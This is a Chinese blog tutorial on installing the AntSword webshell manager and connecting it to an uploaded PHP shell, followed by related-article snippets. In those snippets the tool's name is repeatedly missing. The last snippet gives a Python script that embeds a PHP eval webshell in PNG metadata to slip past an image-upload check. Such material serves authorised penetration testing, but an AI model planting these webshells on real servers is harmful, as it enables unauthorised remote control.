【webshell工具——蚁剑】蚁剑安装使用教程

已于 2023-02-08 14:43:56 修改
阅读量1.7w 收藏 90
点赞数 11
文章标签: php
于 2023-02-06 07:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SUSUYUA/article/details/128894918
版权

前言

本篇内容主要为webshell工具蚁剑的安装以及使用,本人也通过查询较多的文章,进行了总结,由于是第一次接触,有些地方可能存在问题,欢迎评论区留言。

[步骤1] 蚁剑工具的下载

废话不多说直接放链接
加载(启动)器:
链接: https://github.com/AntSwordProject/AntSword-Loader
加速器选择合适的就行,由于我是下载到虚拟机(用的win10),所以下载的windows 64位的,其他的我暂时没有尝试。
在这里插入图片描述

核心源码:
链接: https://github.com/AntSwordProject/antSword
另外zip下载完成之后,zip下载路径后面还会用到。
在这里插入图片描述
下载完成之后,解压缩如下。

打开加载器(AntSword-Loader -v4.0.3-win32-x64),双击AnSword.exe
在这里插入图片描述

[步骤2] 加载器配置核心代码

点击初始化,选择核心代码所在的文件位置
在这里插入图片描述
配置后重新启动(也就是关闭后再次打开即可)
然后再次双击运行–>空白处鼠标右键–>添加数据–>URL为目标地址后面再加上/xxx.php (也就是要上传的小马),本例用的hack.php,密码在hack.php中给出。
在这里插入图片描述
点击测试连接,显示成功,则点击添加即可。
在这里插入图片描述
双击该数据即可进行终端管理和文件操作
在这里插入图片描述

在这里插入图片描述

SUSUYUA
关注
[ 常用工具篇 ] AntSword 安装使用详解
qq_51577576的博客
09-19 2370
[ 渗透工具篇 ] AntSword安装使用详解 >中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 通俗的讲:中国是 一 款比菜刀还牛的shell控制端软件。 中国推崇模块化的开发思想,遵循开源,就要开得漂亮的原则,致力于为不同层次的人群提供最简单易懂、方便直接的代码展示及其修改说明,努力让大家可以一起为这个项目贡献出力所能及的点点滴滴,让这款工具真正能让大家用得顺心、舒适,让它能为大家施展出最人性化最适合你的能力!
中国使用教程.zip
12-12
中国使用教程.zip 中国采用了Electron作为外壳,ES6作为前端代码编写语言 利用js调用shell执行XSS代码
安装使用
weixin_64359465的博客
03-12 231
1.打开AntSword-Loader-v4.0.3--x64 找到AntSword.exe打开。初始化选择压缩包的另外一个文件夹 antSword-master。
中国-安装步骤
zhangqqa的博客
10-26 2294
需要一个空文件夹来存放数据和源代码(我是直接在该目录下创建了一个workspace空目录)- 在安装的时候,杀毒软件会报出威胁,关闭以后再去安装。点击初始化,选择好空目录以后,等待安装完成就好了。这种问题,应该以管理员权限来进行安装。选中Antsword.exe。下载对应环境的加载器。
(antSword)的使用
2301_80085755的博客
10-26 3415
一.获取
CTF中如何在Windows下安装中国安装教程
weixin_44632787的博客
06-17 888
如何在Windows下安装中国 首先要下载好工具。你可以访问下面这个百度网盘来下载中国。 链接:https://pan.baidu.com/s/1dkgEikdNtcP-Cw6atDtYRA 提取码:qwol 由于大部分CTF工具都会提示有病毒啥的,所以在使用这些工具的时候最好是在虚拟机下进行。因为我也不知道是不是真的有木马病毒。而且学安全类最好要在虚拟机安装个Windows和Kali这些系统。。。因为迟早会用上。 那么在进行解压前,要保证好关闭你系统里的实时防护功能。 解压后得到这个文件夹
中国安装教程
xuhc25的博客
06-20 669
1、将文件解压: 在GitHub下载时需要下载两个部分, 一个是项目核心源码(AntSword),另一个是加载器(AntSword-Loader); 加载器则分为三个版本:Mac、Windows、Linux。 2、打开加载器: AntSword-Loader 3、初始化: 选择工作目录 然后重启即可。 ...
中国安装使用教程
Karka_的博客
03-21 5448
中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。如上主要包括的下载,连接一句话木马,更改木马连接参数,绕过WAF。
中国(AntSword)安装使用教程
热门推荐
alert['Hello World']
08-24 11万+
项目地址 加载器: https://github.com/eastmountyxz/AntSword-Experiment/ 项目核心源码: https://github.com/yuyuko233/AntSword 如果从github上下载很卡,可以去复制链接到githubd上下载 https://githubd.com 安装教程使用的渗透机为windows10,下载好会包含两个文件: 使用教程 插件安装 ...
安装使用教程(附:上传漏洞示例)
li963820454的博客
04-06 2万+
简单安装使用教程(附带示例)
4.0.3安装包,附带安装教程
06-01
4.0.3安装包,附带安装教程
强大的webshell管理工具——
12-26
中国,免费拿走,自己踩过的坑,不想别人再踩
antsword中国
01-22
【AntSword中国】是一款知名的网络安全工具,主要用于远程服务器的安全检测与管理。这款工具以其小巧、便捷、高效的特点,在网络安全领域内受到广大技术人员的青睐。AntSword的名称来源于“蚂”与“”的结合...
【木马终端】————1、中国使用与功能介绍
Fly_鹏程万里
08-08 1万+
前言 说起webshell终端管理工具大多数人都会说“中国菜刀”,确实“中国菜刀”伴随着我们一起在网络安全道路上走了好久好久,它算的上是webshell终端管理工具的“启蒙导师”。今天给大家要介绍的是一个功能更加强大而且好用的webshell终端管理工具——中国。 下载 中国的项目地址:https://github.com/AntSwordProject/antSword ...
Cobalt Strike汉化版——安装使用教程_kali安装cobaltstrike4
2401_84253894的博客
04-26 4089
Cobalt Strike是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。分为服务器和客户端,方便团队合作。cs服务器部署在公网控制着受害者主机,而攻击者可以直接访问cs服务器进而控制受害主机,不用再通过端口转发使用msf控制受害主机,简单方便!New Connection #新建连接,支持连接多个服务器端Preferences #设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录。
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
的下载安装使用
weixin_58849785的博客
04-10 6947
中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
中国(antSword)下载、安装使用教程
qq_46603839的博客
04-29 8912
antsword
使用
最新发布
03-17
### 关于使用方法 是一款功能强大的WebShell管理工具,支持多种编程语言环境下的反序列化和命令执行操作。以下是关于其基本原理以及如何配置和使用的详细介绍: #### 基本工作原理 的核心机制在于通过特定函数实现远程代码执行 (RCE),具体如下: - **PHP**: 利用了 `assert` 和 `eval` 函数来解析并运行恶意脚本[^2]。 - **ASP**: 仅依赖 `eval` 来完成动态代码注入与执行。 - **JSP**: 运用 Java 的类加载器 (`ClassLoader`) 动态编译和加载字节码文件,并通常伴随 Base64 编码解码过程以隐藏敏感逻辑。 这些特性使得能够适应不同服务器端技术栈的需求,在渗透测试场景中有广泛应用价值。 #### 安装部署流程 为了正常使用客户端及其服务端组件,请按照以下说明准备相应环境: 1. 下载官方发布的最新版本程序包; 2. 将压缩后的安装文件上传到目标主机指定路径下(例如 `/var/www/html/antSword_server/` 或其他 Web 访问可达位置)[^4]; 3. 创建必要的数据存储目录结构,比如用于保存 MongoDB 数据库记录的 `mongodbdata` 文件夹以及存放日志信息的日志目录 `logs` [^4]: ```bash mkdir -p /path/to/mongodbdata /path/to/logs ``` #### 配置连接参数 启动前需调整默认设置满足实际需求,主要涉及以下几个方面: - **监听地址与端口**:修改配置文件中的 bind_ip 和 port 字段定义对外提供服务的具体网络接口及端口号; - **认证方式**:启用密码保护模式防止未授权访问风险; - **持久化选项**:开启自动重连等功能提升稳定性表现。 完成后即可尝试初始化 session 并验证交互效果。 --- ### 实践案例分析 假设存在这样一个漏洞情景——某网站允许用户提交图片素材却缺乏严格校验机制,则可能被攻击者利用绕过检测规则从而植入木马文件。此时可以参照下面给出的例子进行模拟演练: 已知条件表明只接受三种 MIME 类型分别为 `image/jpeg`, `image/png`, `imgae/gif` 的资源上传请求[^3]。因此我们需要构造伪装成合法图像格式但实际上嵌入可被执行指令的内容体递交过去。 借助 Python 脚本快速生成符合上述要求的同时还暗藏 PHP payload 的样本供后续导入测试之用: ```python from PIL import Image, PngImagePlugin import io def create_malicious_image(payload=b"<?php @eval($_POST['cmd']); ?>"): img = Image.new('RGB', (100, 100)) buffer = io.BytesIO() meta_info = PngImagePlugin.PngInfo() # Add malicious code as comment field inside PNG metadata. meta_info.add_text("Comment", str(payload)) img.save(buffer, format="PNG", pnginfo=meta_info) return buffer.getvalue() if __name__ == "__main__": with open("./malicious.png", "wb") as f: f.write(create_malicious_image()) ``` 成功制作完毕之后再配合平台发起进一步探索活动直至达成预期成果为止! ---
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值